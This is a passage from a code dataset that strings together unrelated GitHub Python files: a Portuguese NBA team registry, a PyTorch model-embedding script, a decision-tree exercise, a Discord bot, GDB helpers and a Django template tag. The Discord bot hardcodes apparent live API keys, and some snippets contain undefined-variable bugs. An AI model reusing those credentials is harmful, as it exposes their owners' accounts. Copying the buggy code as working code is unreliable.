Times\" )\n print(\"ID Equipe Conferência \\n\")\n #desta linha até a linha 38 haviam comentários inutilizados \n # na linha 36 havia a variável c e foi alterada para flag \n flag=0; \n if times:\n for i in times:\n flag+=1;\n #a variável separador possuía o nome de separadorL\n separador = i.split(\";\");\n time = separador[0];\n conferencia = separador[1];\n print(f\"{c}.{time:<30}{conferencia:<30} \")\n else:\n print(\"Não há equipes registradas\")\n return\n #das linhas 50 até 54 haviam comentários inutilizados\ndef pesquisarTimes():\n titulo(\" \"*20 + \"PesquisarTimes Times\\n\" )\n keyword = input(\"Pesquisa por nome ou conferencia: \")\n print(\"\\nTime Conferência\\n\")\n print(\"=\"*50)\n flag = 0;\n for i in times:\n separador = i.split(\";\")\n #a variavel separador possuia o nome de separadorP\n time = separador[0];\n conferencia = separador[1];\n if keyword.upper() in i.upper(): \n print(f\"{time:<37}{conferencia:<38}\")\n flag +=1\n \n if flag == 0:\n print(f\"A equipe {keyword} não encontrado ;) \")\n print(\"=\"*50)\n\ndef excluirTimes():\n listarTimes()\n titulo(\"ExcluirTimes time\")\n\n #a variavel idExclusao era chamada de exc\n idExclusao = int(input(\"ID do time (0 para sair): \"))\n if idExclusao == 0:\n return\n controla = idExclusao - 1\n mensagem = times.pop(controla)\n \n print(f\"Sucesso !O time {controla+1} foi excluído !\")\n\ndef alterarTimes():\n\n listarTimes()\n \n titulo(\"Editar dados\")\n\n #a variavel id Alteracao era chamada de alt\n idAlteracao = int(input(\"ID da equipe (0, para sair): \"))\n \n if idAlteracao == 0:\n return\n #as variaveis nomeEquipe e novoNome eram nomeadas como nome_equipe e novo_nome\n nomeEquipe = times[idAlteracao-1].split(\";\")\n novoNome = input(f\"A equipe {nomeEquipe[0]} está registrada na conferência {nomeEquipe[1]}\\nO novo nome será :\")\n \n selecionaConferencia = int(input(\"Conferência da equipe (1. Leste || 2. Oeste):\"))\n\n if selecionaConferencia == 1:\n times[alt -1]= novoNome + ';Leste'\n print(f\"{novo_nome} alterado na conferencia LESTE \")\n\n if selecionaConferencia == 2:\n times[alt -1]= novoNome + ';Oeste'\n print(f\"{novo_nome} alterado na conferencia OESTE \")\n\n print(\"Alterações realizadas com sucesso !! \")\n\ndef resumo():\n titulo(\"Resumo ds Equipes\")\n num = len(times)\n l =0;\n o =0;\n for parte in times:\n separador = parte.split(\";\")\n if separador[1].upper() == 'Leste'.upper():\n l+=1\n\n elif separador[1].upper() == 'Oeste'.upper():\n o +=1\n print(f\"Total de equipes: {num}\")\n print(f\"Nº de equipes na conferência Leste: {l}\")\n print(f\"Nº de equipes na conferência Oeste: {o}\")\n \ndef salvar():\n # abre o arquivo produtos.txt, no modo \"w\", que é a criação do arquivo\n with open(\"times.txt\", \"w\") as arq:\n for time in times:\n arq.write(f\"{time}\\n\")\n\ndef carregar_dados():\n # abre o arquivo para leitura (r: read)\n \n with open(\"times.txt\", \"r\") as arq:\n linhas = arq.read().splitlines()\n \n for linha in linhas:\n partes = linha.split(\";\")\n times.append(linha)\n# no início do programa carrega os dados\nif os.path.exists(\"times.txt\"):\n carregar_dados()\n#na linha 143 havia um comentário indicando a função while como \"programa principal\"\nwhile True:\n titulo(\"Cadastro de Times\", \"=\")\n print(\"1. IncluirTimes Time\")\n print(\"2. Listagem de Times\")\n print(\"3. Pesquisar Times\")\n print(\"4. Excluir Times\")\n print(\"5. Editar Times\")\n print(\"6. Resumo\")\n print(\"7. Finalizar\")\n opcao = int(input(\"Opção: \"))\n if opcao == 1:\n incluirTimes()\n elif opcao == 2:\n listarTimes()\n \n elif opcao == 3:\n pesquisarTimes()\n \n elif opcao == 4:\n excluirTimes()\n \n elif opcao == 5:\n alterarTimes()\n \n elif opcao == 6:\n resumo()\n \n else:\n break\n\n# executa ao finalizar o programa (salva os dados)\nsalvar()\n","repo_name":"R3N4NR/pythonNBA","sub_path":"timesNBA.py","file_name":"timesNBA.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33994725559","text":"import argparse\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport model\nimport data\nfrom match_word2vecs import load_embeddings, getWordvectors\nimport pickle\n\nlayernames = ['AbsoluteValue','Concat','Convolution2D','Dense','Dropout','Eltwise','Flatten','LRN','BatchNormalization','Pooling2D','Power','ReLU','Sigmoid','Tanh']\nAttributes = ['nb_filter','kernel_row','stride_col','border_mode','init','bias','output_dim','probability','operation','local_size']\nnoparamlayers = ['AbsoluteValue','Eltwise','Flatten','BatchNormalization','Power','ReLU','Sigmoid','Tanh']\nmodel_root_path = '../models/'\nrnn_model_path = model_root_path + 'model_bs512_lr20.pt'\ndictionary_path = model_root_path + 'dict.pkl'\ncriterion = nn.CrossEntropyLoss()\n\ndef myargparser():\n parser = argparse.ArgumentParser(description='Model2Representation')\n parser.add_argument('--seed', type=int, default=1111, help='random seed')\n parser.add_argument('--cuda', action='store_true', help='use CUDA')\n parser.add_argument('--data', type=str, default='../data/lm_model/',help='location of the data corpus')\n parser.add_argument('--batch_size', type=int, default=20, metavar='N', help='batch size')\n parser.add_argument('--eval_batch_size', type=int, default=1, help='Batch size during evaluation')\n parser.add_argument('--bptt', type=int, default=35,help='sequence length')\n parser.add_argument('--emsize', type=int, default=200, help='size of word embeddings')\n parser.add_argument('--nhid', type=int, default=200, help='number of hidden units per layer')\n parser.add_argument('--lr', type=float, default=20, help='initial learning rate')\n parser.add_argument('--dropout', type=float, default=0.2, help='dropout applied to layers (0 = no dropout)')\n parser.add_argument('--save', type=str, default='model.pt', help='path to save the final model')\n parser.add_argument('--testOnly', action='store_true', help='Perform only testing')\n parser.add_argument('--epochs', type=int, default=40, help='upper epoch limit')\n return parser\n\ndef model2sentence(model_nlds):\n sentence = ''\n for key in model_nlds['nldsJson']['layers']:\n if key['layer_type'] in layernames:\n params = key['layer_params']\n if key['layer_type'] == 'Convolution2D':\n #assert(params['kernel_col']==params['kernel_row'])\n #assert(params['stride_col']==params['stride_row'])\n word = key['layer_type']+'_'+str(params['nb_filter'])+'_'+str(params['kernel_row'])+'_'+str(params['kernel_col'])+'_'+str(params['stride_row'])+'_'+str(params['stride_col'])+'_'+str(params['border_mode'])\n elif key['layer_type'] in noparamlayers:\n word = key['layer_type']\n elif key['layer_type'] == 'Pooling2D':\n word = key['layer_type']+'_'+str(params['kernel_row'])+'_'+str(params['kernel_col'])+'_'+str(params['stride_row'])+'_'+str(params['stride_col'])+'_'+str(params['function'])+'_'+str(params['border_mode'])\n elif key['layer_type'] == 'Dropout':\n word = key['layer_type']+'_'+str(params['probability'])\n elif key['layer_type'] == 'Eltwise':\n word = key['layer_type']+'_'+str(params['operation'])\n elif key['layer_type'] == 'Dense':\n word = key['layer_type']+'_'+str(params['output_dim'])+'_'+str(params['init'])\n elif key['layer_type'] == 'LRN':\n word = key['layer_type']+'_'+str(params['local_size'])\n else:\n print(key)\n print('Error')\n word = word+' '\n sentence+=word\n #print(word)\n return sentence\n\n# get_batch subdivides the source data into chunks of length args.bptt.\n# If source is equal to the example output of the batchify function, with\n# a bptt-limit of 2, we'd get the following two Variables for i = 0:\n# | a g m s | | b h n t |\n# | b h n t | | c i o u |\n# Note that despite the name of the function, the subdivison of data is not\n# done along the batch dimension (i.e. dimension 1), since that was handled\n# by the batchify function. The chunks are along dimension 0, corresponding\n# to the seq_len dimension in the LSTM.\ndef get_batch(source, i, opt):\n seq_len = min(opt.bptt, len(source) - 1 - i)\n data = source[i:i+seq_len]\n target = source[i+1:i+1+seq_len].view(-1)\n return data, target\n\ndef repackage_hidden(h):\n \"\"\"Wraps hidden states in new Tensors, to detach them from their history.\"\"\"\n if isinstance(h, torch.Tensor):\n return h.detach()\n else:\n return tuple(repackage_hidden(v) for v in h)\n\ndef evaluate(data_source, model, dictionary, opt):\n # Turn on evaluation mode which disables dropout. Gives perplexity\n model.eval()\n total_loss = 0.\n ntokens = len(dictionary)\n hidden = model.init_hidden(opt.eval_batch_size)\n with torch.no_grad():\n for i in range(0, data_source.size(0) - 1, opt.bptt):\n data, targets = get_batch(data_source, i, opt)\n output, hidden = model(data, hidden)\n output_flat = output.view(-1, 13580)\n total_loss += len(data) * criterion(output_flat, targets[0]).item()\n hidden = repackage_hidden(hidden)\n return total_loss / len(data_source)\n\ndef test(data_source, model, dictionary, opt):\n # Turn on evaluation mode which disables dropout.\n model.eval()\n total_loss = 0.\n ntokens = len(dictionary)\n hidden = model.init_hidden(opt.eval_batch_size)\n listhid = []\n with torch.no_grad():\n for i in range(0, data_source.size(0) - 1, opt.bptt):\n data, targets = get_batch(data_source, i, opt)\n output, hidden = model(data, hidden)\n output_flat = output.view(-1, ntokens)\n total_loss += len(data) * criterion(output_flat, targets).item()\n listhid.append(hidden[-1].cpu().numpy())\n hidden = repackage_hidden(hidden)\n return listhid\n\ndef batchify(data, bsz):\n # Work out how cleanly we can divide the dataset into bsz parts.\n nbatch = data.size(0) // bsz\n # Trim off any extra elements that wouldn't cleanly fit (remainders).\n data = data.narrow(0, 0, nbatch * bsz)\n # Evenly divide the data across the bsz batches.\n data = data.view(bsz, -1).t().contiguous()\n return data#.to(device)\n\ndef get_representation(model_nlds):\n parser = myargparser()\n opt = parser.parse_args()\n\n torch.manual_seed(opt.seed)\n if torch.cuda.is_available():\n if not opt.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n device = torch.device(\"cuda\" if opt.cuda else \"cpu\")\n\n with open(rnn_model_path, 'rb') as f:\n rnn_model = torch.load(f, map_location='cpu')\n # after load the rnn params are not a continuous chunk of memory\n # this makes them a continuous chunk, and will speed up forward pass\n rnn_model.rnn.flatten_parameters()\n\n with open(dictionary_path, 'rb') as f:\n dictionary = pickle.load(f)\n\n sentence = model2sentence(model_nlds)\n corpus = data.Corpus(\"\", dictionary)\n eval_batch_size = 3\n test_data_2 = batchify(corpus.tokenize_sentence(sentence), eval_batch_size).to(device)\n test_data_2 = test_data_2.view(1, -1).t().contiguous()\n test_data_2.to(device)\n listhid = test(test_data_2, rnn_model, dictionary, opt)\n model_representation = np.squeeze(np.transpose(np.sum(listhid[0],axis=0)))\n return model_representation\n\n\nif __name__ == '__main__':\n import json\n nlds_file_path = '../data/nlds/resnet_20'\n with open(nlds_file_path) as dump:\n model_nlds = json.load(dump)\n get_representation(model_nlds)\n sentence = model2sentence(model_nlds)\n print(sentence)","repo_name":"goodboyanush/dl-model-recommend","sub_path":"code/model2vec.py","file_name":"model2vec.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"38255308961","text":"################################################################\n# This is an exercise program that is for decision tree method #\n# developed by ramkumar for problem 7 #\n################################################################\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn import tree\nfrom sklearn.model_selection import train_test_split\n\n\"\"\" \nfor this exercise, the data from titanic have been given.\nout of all the columns, the effective columns are\noutput - Survived\ninput - Pclass, Sex, Age, Fare\n\"\"\"\n\n# reading the data from file\nfid = pd.read_csv(\"exercise_data.csv\")\n\n# spliting data into inputs and outputs\ninputs = fid[[\"Pclass\",\"Sex\",\"Age\",\"Fare\"]]\noutputs = fid.Survived\n\n# filling the missing data with median on the columns of Age\ninputs[\"Age\"] = inputs.Age.fillna(int(inputs[\"Age\"].median()))\n\n# encoding labels for sex column\nSex_le = LabelEncoder()\ninputs[\"Sex_n\"] = Sex_le.fit_transform(inputs[\"Sex\"])\n\"\"\"\n Here the encoding is again done based on Alphabetcial order\nhence Male = 1; Female = 0\n\"\"\"\n\n# appending to final inputs_n\ninputs_n = inputs.drop([\"Sex\"], axis =\"columns\")\n\n# spliting the data into testing and training\nitrain,itest,otrain,otest = train_test_split(inputs_n,outputs, test_size = 0.2)\n\n# creating and training the model\nmodel = tree.DecisionTreeClassifier()\nmodel.fit(itrain, otrain)\n\n# checking the test score\nprint(\"\\n\\n\\nModel Accuracy : \",model.score(itest,otest)*100.0,\" %\")\n","repo_name":"Baiyu3618/codes","sub_path":"python_scripts/Machine_learning/Tutorials/p7_decision_tree/exercise/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9680821800","text":"import discord, os, datetime, aiosqlite, jishaku, random, aiomysql, difflib, aiohttp, json, nacl, traceback, asyncio, sys, textwrap\nfrom datetime import datetime, timezone, timedelta\nfrom discord.ext import tasks, commands\nfrom modules import utils\nfrom modules import cache, prefix, extensions, logging, watcherr\nfrom cogs.voice import interfacebuttons\nfrom utils import maria\n\ndone = utils.emoji(\"done\")\nfail = utils.emoji(\"fail\")\nwarn = utils.emoji(\"warn\")\nreply = utils.emoji(\"reply\")\ndash = utils.emoji(\"dash\")\n#\nsuccess = utils.color(\"done\")\nerror = utils.color(\"fail\")\nwarning = utils.color(\"warn\")\n\n\nclass vile(commands.AutoShardedBot):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.db2 = maria.MariaDB(self)\n self.db = utils.read_json\n self.db.get = utils.read_json\n self.db.put = utils.write_json\n self.utils = utils\n self.os = os\n self.color = 0xB1AAD8\n self.done = \"<:v_done:1010717995099758634>\"\n self.fail = \"<:v_warn:1010718010828390400>\"\n self.reply = \"<:vile_reply:997487959093825646>\"\n self.dash = \"<:vile_dash:998014671107928105>\"\n self.removebg_api = [\n \"52tiT5sgHQxoVBoQhvXPPaEy\",\n \"stFyKj4GTUY3CUPFYKWmt57V\",\n \"nFXg4MpkATXYVHcJM5J9hq1L\",\n ]\n self.logger = logging\n self.owner_ids = [\n 839221856976109608,\n 812126383077457921,\n 352190010998390796,\n 979978940707930143,\n 461914901624127489,\n ]\n self.footerIcon = \"https://cdn.discordapp.com/emojis/998805272468390048.gif?size=4096&quality=lossless\"\n self.exact_start = datetime.now()\n self.aiter = self.utils.aiter\n self.global_cd = commands.CooldownMapping.from_cooldown(\n 3, 5, commands.BucketType.member\n )\n self.colors = {\n \"grey\": 30,\n \"red\": 31,\n \"green\": 32,\n \"yellow\": 33,\n \"blue\": 34,\n \"magenta\": 35,\n \"cyan\": 36,\n \"white\": 37,\n }\n self.send_color = lambda n, m: f\"\u001B[{self.colors[n]}m{m}\u001B[0m\"\n self.cache = cache.Cache(self)\n self.rival_key = '48108339-2e9e-4bab-bae5-55cf5d63bfec'\n self.rival_api='48108339-2e9e-4bab-bae5-55cf5d63bfec'\n\n async def setup_hook(self) -> None:\n self.loop.create_task(self.db2.initialize_pool())\n self.session = aiohttp.ClientSession(loop=self.loop)\n self.loop.create_task(self.cache.initialize_settings_cache())\n self.add_view(interfacebuttons())\n\n async def get_user_data(self, user):\n\n async with aiohttp.ClientSession() as session:\n async with session.get(\n f\"https://api.rival.rocks/user\", headers={'api-key': self.rival_api},\n params={\"user_id\": user.id},\n ) as resp:\n return self.utils.obj(**(await resp.json())[\"data\"])\n\n async def find_member(self, guild: discord.Guild, name: str = None):\n members = [m.name.lower() for m in guild.members]\n closest = difflib.get_close_matches(name.lower(), members, n=3, cutoff=0.5)\n if closest:\n for m in guild.members:\n if m.name.lower() == closest[0].lower():\n member = m\n\n return member\n else:\n raise commands.MemberNotFound(name)\n\n @property\n def owner(self) -> discord.User:\n return self.get_user(812126383077457921)\n\n @property\n def user_count(self) -> int:\n return sum(len(g.members) for g in self.guilds)\n\n @property\n def guild_count(self) -> int:\n return len(self.guilds)\n\n\nbot = vile(\n command_prefix=prefix.prefix,\n description=\"free multipurpose bot\",\n intents=discord.Intents.all(),\n help_command=None,\n activity=discord.Streaming(\n name=\"in discord.gg/heist\", url=\"https://twitch.tv/sosaghostie\"\n ),\n strip_after_prefix=True,\n allowed_mentions=discord.AllowedMentions(\n everyone=False, replied_user=False, users=True, roles=True\n ),\n max_messages=500,\n)\n\n\n@bot.event\nasync def on_ready():\n\n await extensions.load(bot)\n bot.uptime = datetime.now()\n watcher1 = watcherr.RebootRunner(bot, path='cogs', preload=False)\n watcher2=watcherr.RebootRunner(bot, path='events', preload=False)\n watcher3=watcherr.RebootRunner(bot, path='modules', preload=False)\n await watcher1.start()\n await watcher2.start()\n await watcher3.start()\n\n@bot.event\nasync def on_message(message):\n\n if message.author.bot or not message.guild:\n return\n\n db = bot.db(\"afk\")\n if db.get(str(message.author.id)):\n if db.get(str(message.author.id)).get(\"lastseen\"):\n ls = utils.moment(\n datetime.fromtimestamp(\n int(db.get(str(message.author.id)).get(\"lastseen\"))\n )\n )\n if db.get(str(message.author.id)):\n context = await bot.get_context(message)\n if not context.invoked_with:\n if db.get(str(message.author.id)).get(\"guild\"):\n if message.guild.id in db.get(str(message.author.id)).get(\"guild\"):\n db.pop(str(message.author.id))\n bot.db.put(db, \"afk\")\n embed = discord.Embed(\n color=0x2F3136,\n description=f\":wave: {message.author.mention}**:** welcome back, you were last seen **{ls} ago**\",\n )\n return await message.reply(embed=embed)\n\n await bot.process_commands(message)\n\n\n# checks\n@bot.check\nasync def cooldown_check(ctx):\n\n bucket = ctx.bot.global_cd.get_bucket(ctx.message)\n retry_after = bucket.update_rate_limit()\n if retry_after:\n raise commands.CommandOnCooldown(\n bucket, retry_after, commands.BucketType.member\n )\n return True\n\n\n@bot.check\nasync def disabled_command_check(ctx):\n\n db = bot.db(\"disabled\")\n if db.get(str(ctx.guild.id)):\n if ctx.command.name in db[str(ctx.guild.id)]:\n return False\n return True\n\n\n@bot.check\nasync def blacklist_check(ctx):\n\n db = ctx.bot.db(\"prefixes\")\n if db.get(str(ctx.author.id)):\n x = db[str(ctx.author.id)][\"prefix\"]\n if x == \"…\":\n return False\n return True\n\n\n@bot.check\nasync def ignoredchannel_check(ctx):\n\n db = ctx.bot.db(\"ignorechannel\")\n if db.get(str(ctx.guild.id)):\n if ctx.channel.id in db[str(ctx.guild.id)]:\n return False\n return True\n\n\n@bot.check\nasync def data_check(ctx):\n\n db = ctx.bot.db(\"nodata\")\n if not db.get(str(ctx.author.id)):\n\n class bttns(discord.ui.View):\n def __init__(self, invoker: discord.User | discord.Member = None):\n self.invoker = invoker\n super().__init__(timeout=30)\n\n @discord.ui.button(\n style=discord.ButtonStyle.grey,\n disabled=False,\n emoji=utils.emoji(\"done\"),\n )\n async def data_true(\n self, interaction: discord.Interaction, button: discord.Button\n ):\n if interaction.user.id != self.invoker.id:\n return\n\n x = interaction.client.db(\"nodata\")\n x[str(interaction.user.id)] = {}\n x[str(interaction.user.id)][\"data\"] = True\n interaction.client.db.put(x, \"nodata\")\n await bot.process_commands(ctx.message)\n await interaction.response.edit_message(view=None)\n await interaction.response.send_message(\":thumbsup:\")\n\n @discord.ui.button(\n style=discord.ButtonStyle.grey,\n disabled=False,\n emoji=utils.emoji(\"fail\"),\n )\n async def data_false(\n self, interaction: discord.Interaction, button: discord.Button\n ):\n if interaction.user.id != self.invoker.id:\n return\n\n x = interaction.client.db(\"nodata\")\n x[str(interaction.user.id)] = {}\n x[str(interaction.user.id)][\"data\"] = False\n interaction.client.db.put(x, \"nodata\")\n await interaction.response.edit_message(view=None)\n await interaction.response.send_message(\":thumbsup:\")\n\n await ctx.reply(\n embed=discord.Embed(\n color=utils.color(\"warn\"),\n description=f\"{utils.emoji('warn')} {ctx.author.mention}**:** do you **agree** to vile's [**privacy policy**](https://tiny.cc/vilebot/privacy-policy)\",\n ),\n view=bttns(invoker=ctx.author),\n )\n return False\n else:\n return db[str(ctx.author.id)][\"data\"] == True\n\n\nif __name__ == \"__main__\":\n bot.run(utils.read_json(\"config\")[\"token\"], log_level=20)\n","repo_name":"hifthot/skidcity","sub_path":"vile/vile.py","file_name":"vile.py","file_ext":"py","file_size_in_byte":8908,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"3598532737","text":"# -*- coding: utf-8 -*-\n\nfrom analyser.core.tasking import BaseTask\nfrom analyser.core.tasking.standard_tasks import BookSavingTask\nfrom Retriever import Retriever\nfrom analyser.parsers import get_soup\n\nclass InitialTask(BaseTask):\n def __init__(self, site_link):\n BaseTask.__init__(self)\n self.weight = 10\n self.need_html = True\n self.link = site_link\n\n def __repr__(self):\n return ''\n\n def execute(self, html):\n soup = get_soup(html)\n queue = Retriever.get_queue(soup)\n Retriever.correct_queue(queue, self.link)\n tasks = [ GetBookInfoTask(q['tags'], q['link']) for q in queue ]\n self.tasks = tasks\n return True\n\nclass GetBookInfoTask(BaseTask):\n def __init__(self, tags, link):\n BaseTask.__init__(self)\n self.weight = 10\n self.need_html = True\n self.link = link\n self.tags = tags\n\n def __repr__(self):\n return '' % self.link\n\n def execute(self,html):\n soup = get_soup(html)\n book_info = Retriever.get_book_info(soup)\n book_info.tags = self.tags\n book_info.pagelink = self.link\n self.tasks = [ BookSavingTask(book_info) ]\n return True","repo_name":"ktisha/ebook-service","sub_path":"analyser/parsers/NehudlitRu/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"545425779","text":"import numpy as np\n\n\nclass InputNode:\n def __init__(self, is_join: bool, is_scan: bool, is_aggregate: bool, relation: str, left: str, right: str,\n tables: list):\n self.is_join = is_join\n self.is_scan = is_scan\n self.is_aggregate = is_aggregate\n self.relation = relation if len(relation) > 0 else None\n self.left = left if len(left) > 0 else None\n self.right = right if len(right) > 0 else None\n self.vector = list(np.zeros((3 + len(tables),), dtype=int))\n self.vectorize(tables)\n\n def vectorize(self, tables: list):\n if self.is_aggregate:\n self.vector[0] = 1\n elif self.is_join:\n self.vector[1] = 1\n self.vector[tables.index(self.left) + 3] = 1\n self.vector[tables.index(self.right) + 3] = 1\n elif self.is_scan:\n self.vector[2] = 1\n self.vector[tables.index(self.left) + 3] = 1\n","repo_name":"teogoulas/ml-query-optimization","sub_path":"models/json_node.py","file_name":"json_node.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27579570517","text":"import gdb\n\nSILENT_STEPS = True\n\ndef addr2num(addr):\n try:\n return int(addr) # Python 3\n except:\n return long(addr) # Python 2\n \ndef callstack_depth():\n depth = 1\n frame = gdb.newest_frame()\n while frame is not None:\n frame = frame.older()\n depth += 1\n return depth\n\n\nclass StepBeforeNextCall (gdb.Command):\n def __init__ (self):\n super (StepBeforeNextCall, self).__init__ (\"step-before-next-call\",\n gdb.COMMAND_OBSCURE)\n\n def invoke (self, arg, from_tty):\n arch = gdb.selected_frame().architecture()\n\n while True:\n ...\n\n print(\"step-before-next-call: next instruction is a call.\")\n print(\"{}: {}\".format(hex(int(disa[\"addr\"])), disa[\"asm\"]))\n\nclass StepIntoNextCall (gdb.Command):\n def __init__ (self):\n super (StepIntoNextCall, self).__init__ (\"step-into-next-call\", \n gdb.COMMAND_OBSCURE)\n\n def invoke (self, arg, from_tty):\n start_depth = current_depth = callstack_depth()\n\n # step until we're one step deeper\n while ...: ...\n\n # display information about the two top frames\n print(\"Stepped into function {}\\n\".format(gdb.newest_frame().name()))\n gdb.execute(\"frame 0\")\n gdb.execute(\"frame 1\")\n\n\nStepIntoNextCall() \nStepBeforeNextCall()\n","repo_name":"kpouget/tuto-gdb.py","sub_path":"home/python/step_to_next_call.py","file_name":"step_to_next_call.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"7384121225","text":"import os\nimport sys\nimport numpy as np\nimport argparse\nimport tensorflow as tf\nfrom keras.preprocessing.text import tokenizer_from_json\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\n\nsys.path.append(os.path.join('utils'))\nfrom utils import generate_text\n\ndef input_parse():\n # initialise parser\n parser = argparse.ArgumentParser()\n # add arguments\n parser.add_argument('--prompt', type=str, default=\"I am\", help=\"The prompt to start the text generation with.\")\n parser.add_argument('--length', type=int, default=10, help=\"The length of the generated text.\")\n parser.add_argument('--folder_path', type=str, default=\"first_try\")\n # parse the arguments from command line\n args = parser.parse_args()\n # get the variables\n return args\n\ndef generate(prompt, length, folder_path):\n # load data\n file_path = os.path.join(\"in\", folder_path, \"data.npz\")\n\n with np.load(file_path) as data:\n max_sequence_len = data['max_sequence_len']\n\n # load tokenizer\n token_path = os.path.join(\"in\", folder_path, \"tokenizer.json\")\n with open(token_path, 'r', encoding='utf-8') as f:\n tokenizer_json = f.read()\n tokenizer = tokenizer_from_json(tokenizer_json)\n\n # convert tokenizer JSON string to a tokenizer object\n tokenizer = tokenizer_from_json(tokenizer_json)\n\n # path to model\n model_path = os.path.join(\"models\", folder_path)\n\n # load model\n model = tf.keras.models.load_model(model_path)\n\n # generate text\n print(generate_text(prompt, length, model, max_sequence_len, tokenizer))\n\ndef main():\n # get variables\n args = input_parse()\n # generate text\n generate(args.prompt, args.length, args.folder_path)\n\nif __name__ == \"__main__\":\n main()","repo_name":"AddiH/Cultural_Data_Science","sub_path":"Language/03_text_generation/src/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28038430808","text":"'''\n Create variables within templates\n\n Last modified: 2020-11-19\n\n Variables are set at render time. They are not available earlier,\n such as when {% block %} is evaluated.\n\n'''\n\ntry:\n from django import template\nexcept ModuleNotFoundError:\n import sys\n sys.exit('Django required')\n\nimport json\nimport re\n\nfrom solidlibs.python.log import Log\n\nlog = Log()\n\nregister = template.Library()\n\n\nclass VariablesNode(template.Node):\n\n '''\n From http://djangoclips.org/clips/829/:\n\n Here is a Django template tag that allows you to create complex\n variables specified in JSON format within a template.\n\n It enables you to do stuff like:\n\n {% var as person %}\n {\n \"firstName\": \"John\",\n \"lastName\": \"Smith\",\n \"address\": {\n \"streetAddress\": \"21 2nd Street\",\n \"city\": \"New York\",\n \"state\": \"NY\",\n \"postalCode\": 10021\n },\n \"phoneNumbers\": [\n \"212 555-1234\",\n \"646 555-4567\"\n ]\n }\n {% endvar %}\n\n

{{person.firstName}},
\n {{person.address.postalCode}},
\n {{person.phoneNumbers.1}}\n

\n\n This tag also enables me to do dynamic CSS using as follows:\n\n # urlpatters\n urlpatterns = [\n (r'^css/(?P.*\\\\.css)$', 'get_css'),\n ]\n\n #views\n def get_css(request, path):\n return render(request, 'css/%s' % path, {},\n mimetype=\"text/css; charset=utf-8\")\n\n # dynamic css within in /path/to/app/templates/css'\n {% load var %}\n {% var as col %}\n {\n \"darkbg\": \"#999\",\n \"lightbg\": \"#666\"\n }\n {% endvar %}\n\n {% var as dim %}\n {\n \"thinmargin\": \"2em\",\n \"thickmargin\": \"10em\"\n }\n {% endvar %}\n\n body {\n background: {{col.darkbg}};\n margin: {{dim.thinmargin}};\n }\n\n '''\n\n def __init__(self, nodelist, var_name):\n self.nodelist = nodelist\n self.var_name = var_name\n log.debug(f'var_name: {var_name}')\n\n def render(self, context):\n source = self.nodelist.render(context)\n if source.strip().startswith('{'):\n value = json.loads(source)\n #log.debug(f'value from json: {value}')\n else:\n value = source\n #log.debug(f'value from source: {value}')\n log.debug(f'value type: {type(value)}')\n context[self.var_name] = value\n return ''\n\n@register.tag(name='var')\ndef do_variables(parser, token):\n try:\n tag_name, arg = token.contents.split(None, 1)\n except ValueError:\n msg = f'\"{token.contents.split()[0]}\" tag requires arguments'\n log.debug(msg)\n raise template.TemplateSyntaxError(msg)\n log.debug(f'arg: {arg}')\n m = re.search(r'as (\\w+)', arg)\n if m:\n var_name, = m.groups()\n log.debug(f'var_name arg: {var_name}')\n else:\n msg = f'\"{tag_name}\" tag had invalid arguments'\n log.debug(msg)\n raise template.TemplateSyntaxError(msg)\n\n nodelist = parser.parse(('endvar',))\n parser.delete_first_token()\n return VariablesNode(nodelist, var_name)\n","repo_name":"safeapps/solidlibs","sub_path":"source/django_addons/templatetags/var.py","file_name":"var.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"1805152775","text":"import os\nfrom celery import Celery\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'bert_serv.settings')\nos.environ.setdefault('CELERY_CONFIG_MODULE', 'celeryconfig')\n\napp = Celery('sentiment')\n\napp.config_from_envvar('CELERY_CONFIG_MODULE')\napp.autodiscover_tasks()\n\nif __name__ == '__main__':\n app.start()\n","repo_name":"daveminer/BERT-serv","sub_path":"sentiment/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"26671248977","text":"#! /usr/bin/env Python3\n\ndict1 = {}\n\nstatement = 'This is a statement that is going to be parsed into a dictionary. The quick brown fox jumps over the lazy dog'\n\nfor i in statement:\n if i in dict1.keys():\n dict1[i] += 1\n else:\n dict1[i] = 1\n\nprint(dict1)","repo_name":"Slimgin/Python3-Stuff","sub_path":"dict_stuff.py","file_name":"dict_stuff.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12332109919","text":"##############################################################################################\r\n# Copyright 2018 The Johns Hopkins University Applied Physics Laboratory LLC\r\n# All rights reserved.\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this \r\n# software and associated documentation files (the \"Software\"), to deal in the Software \r\n# without restriction, including without limitation the rights to use, copy, modify, \r\n# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to \r\n# permit persons to whom the Software is furnished to do so.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS 